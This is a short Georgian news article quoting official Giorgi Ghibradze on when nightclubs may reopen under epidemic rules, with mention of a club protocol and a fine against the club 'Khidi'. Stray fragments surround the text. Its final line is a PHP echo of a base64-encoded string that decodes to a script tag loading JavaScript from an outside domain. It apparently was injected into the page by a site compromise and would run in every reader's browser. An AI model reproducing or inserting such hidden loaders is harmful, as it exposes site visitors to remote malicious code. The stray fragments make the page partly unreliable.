celsiusi
ავერსი შნაიდერი
"ზოგიერთ ქვეყანაში ღამის კლუბი გახსნეს, ოღონდ აკრძალულია ცეკვა, რაოდენ სასაცილოც არ უნდა იყოს" - ასე პასუხობს საკოორდინაციო საბჭოს ოპერაციული შტაბის უფროსი, გიორგი ღიბრაძე კითხვას - როდის მიეცემათ ღამის კლუბებს საქართველოში მუშაობის შესაძლებლობა.
 
როგორც მან საკოორდინაციო საბჭოს სხდომის შემდეგ აღნიშნა, ამ საკითხზე კლუბებთან ინტენსიური მუშაობა მიმდინარეობს.
 
"რაც შეეხება ღამის კლუბებს, მოგეხსენებათ, ჯანდაცვის სამინისტროს მხრიდან ინტენსიური მუშაობა მიმდინარეობს ამ სეგმენტთან, რომ ერთი მხრივ სეგმენტს მიეცეს საშუალება ფუნქციონირების, მეორე მხრივ მისი ფუნქციონირება მაქსიმალურად იყოს გადაზღვეული ეპიდემიოლოგიური თვალსაზრისით. ზოგიერთ ქვეყანაში ღამის კლუბი გახსნეს, ოღონდ აკრძალულია ცეკვა, რაოდენ სასაცილოც არ უნდა იყოს", - თქვა გიორგი ღიბრაძემ. 
 
ცნობისთვის, ღამის კლუბებმა ჯანდაცვის სამინისტროს სპეცილური პროტოკოლი წარუდგინეს, რომლის მიხედვითაც ისინი მუშაობის უფლებას ითხოვენ. 
 
საკლუბო ბიზნესმა სპეციალური გეგმა მას შემდეგ დასახა, რაც კლუბ "ხიდზე" შრომის ინსპეცია შევიდა და მისი დალუქვისა და 10 ათასი ლარით დაჯარიმების გადაწყვეტილება მიიღო.
1075
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");